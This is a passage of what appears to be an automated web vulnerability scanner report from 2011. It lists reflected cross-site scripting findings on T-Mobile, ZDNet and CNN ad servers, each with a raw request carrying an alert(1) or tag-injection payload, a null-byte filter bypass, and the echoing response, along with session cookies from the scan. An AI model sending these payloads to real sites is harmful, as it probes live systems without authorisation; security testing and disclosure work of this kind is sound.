Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ablpltqbpes5daeq5kzeoez5; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ablpltqbpes5daeq5kzeoez5; path=/; HttpOnly
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=ZIPISVALID=True&UCCID=U&SessionId=3951be08-818d-44c0-b2a4-ef2091084a29&WT=&DCS=; domain=.t-mobile.com; path=/
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a11%3a06+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:11:06 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:11:06 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:11:06 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Set-Cookie: TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$; domain=.t-mobile.com; expires=Tue, 22-Mar-2011 22:16:06 GMT; path=/
Date: Tue, 22 Mar 2011 22:11:06 GMT
Connection: close
Content-Length: 287631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8b641'-alert(1)-'f75c093fa1');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.257. http://www.t-mobile.com/shop/plans/Cell-Phone-Plans.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /shop/plans/Cell-Phone-Plans.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df240'-alert(1)-'5e417bc190a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/plans/Cell-Phone-Plans.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)df240'-alert(1)-'5e417bc190a
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=s2mfx245v4lznm3hqcs4r445; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s2mfx245v4lznm3hqcs4r445; path=/; HttpOnly
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=ZIPISVALID=True&WT=&DCS=; domain=.t-mobile.com; path=/
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a11%3a07+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:11:07 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:11:07 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:11:07 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Date: Tue, 22 Mar 2011 22:11:07 GMT
Connection: close
Content-Length: 48030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)df240'-alert(1)-'5e417bc190a');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.258. http://www.zdnet.com/blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65ab"><a>aa714f11872 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042 HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: c65ab"><a>aa714f11872

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:06:56 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Wed, 21-Mar-2012 22:06:56 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 135192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/i/r=7005&amp;sg=1815&amp;o=6037%253A12691%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=12691&amp;pid=&amp;cid=100417&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e2:4D88DD574FA7CC&amp;orh=c65ab"><a>aa714f11872&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=c65ab">
...[SNIP]...

1.259. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph¶ms.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 390fc"><script>alert(1)</script>136f1304764 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1390fc"><script>alert(1)</script>136f1304764; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1; CNNid=Ga50a8a73-10408-1300909183-428

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:44:04 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:44:04 GMT
Pragma: no-cache
Content-Length: 3276
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,989,1285,1589,1609,1674,1685,1738,2218,3445,3449,3563,4444,6350,47457,52263,52901,54553,56058,56872,57005,57896,58022,61089,61263,61887,61913,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-1390fc"><script>alert(1)</script>136f1304764&Redirect=https://subs.timeinc.net/MO/mo_cc08081495.jhtml?">
...[SNIP]...

1.260. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197303&page.allowcompete=yes&domId=626108 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197303&page.allowcompete=yes&domId=626108

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf76b"><script>alert(1)</script>9159613ff66 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197303&page.allowcompete=yes&domId=626108 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1bf76b"><script>alert(1)</script>9159613ff66; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:19 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:19 GMT
Pragma: no-cache
Content-Length: 2716
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,52263,52751,52901,56058,56872,57005,57896,58022,58702,60072,60073,60092,60443,60444,60458,60541,60599,61089,61263,61399,61421,61427,61887,61913,64144&amp;RawValues=NGUSERID%2Caa55a24-13483-843388069-1bf76b"><script>alert(1)</script>9159613ff66%2CTIL%2C1300909197303&amp;random=zwwRWg,bgyutkxclbzeW&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.261. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=211644 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=211644

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b497c"><script>alert(1)</script>652ad2a82f2 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=211644 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-1b497c"><script>alert(1)</script>652ad2a82f2; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1; CNNid=Ga50a8a73-10408-1300909183-428

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:56 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:56 GMT
Pragma: no-cache
Content-Length: 2932
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,52263,52901,56058,56872,57005,57896,58022,58312,58702,59469,60072,60073,60092,60443,60444,60458,60541,61089,61263,61399,61421,61427,61887,61913,64144&amp;RawValues=NGUSERID%2Caa55a24-13483-843388069-1b497c"><script>alert(1)</script>652ad2a82f2%2CTIL%2C1300909197304&amp;random=Wzwcbs,bgyutlNclbKwI&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.262. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc7d"><script>alert(1)</script>5c840e50c12 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AICookieTest=774; WSOD%5FmyStocksTab=last5; NGUserID=aa55a24-13483-843388069-11dc7d"><script>alert(1)</script>5c840e50c12; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_1758|Q_756|Q_755|Q_578|Q_577|Q_539|Q_242|Q_240|Q_236; __qca=P0-55912109-1300909183336; s_vi=[CS]v1|26C52637051D2558-4000010200004306[CE]; rsi_segs=D08734_70117|D08734_70098|H07710_10515|D08734_D72009|H07710_10541; adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ain%25253Amoney%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmoney.cnn.com%25252F2011%25252F03%25252F23%25252Fmarkets%25252Fthebuzz%25252Findex.htm%2526ot%253DA; __unam=7549672-12ee43b1306-292991ae-1

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:43:01 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad2:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Wed, 23 Mar 2011 19:43:01 GMT
Pragma: no-cache
Content-Length: 7754
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
7457,52263,52901,56058,56872,57005,57896,58022,58312,58702,60072,60073,60092,60443,60444,60458,60541,60542,61089,61263,61399,61421,61427,61887,61913,64144&RawValues=NGUSERID%2Caa55a24-13483-843388069-11dc7d"><script>alert(1)</script>5c840e50c12%2CTIL%2C1300909197304&Redirect=http://ad.doubleclick.net/clk;237101129;60716949;h" target="_blank">
...[SNIP]...

1.263. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863

Issue detail

The value of the NGUserID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0031326'-alert(1)-'be4c75d55f6 was submitted in the NGUserID cookie. This input was echoed as 31326'-alert(1)-'be4c75d55f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz&params.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/03/23/markets/thebuzz/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
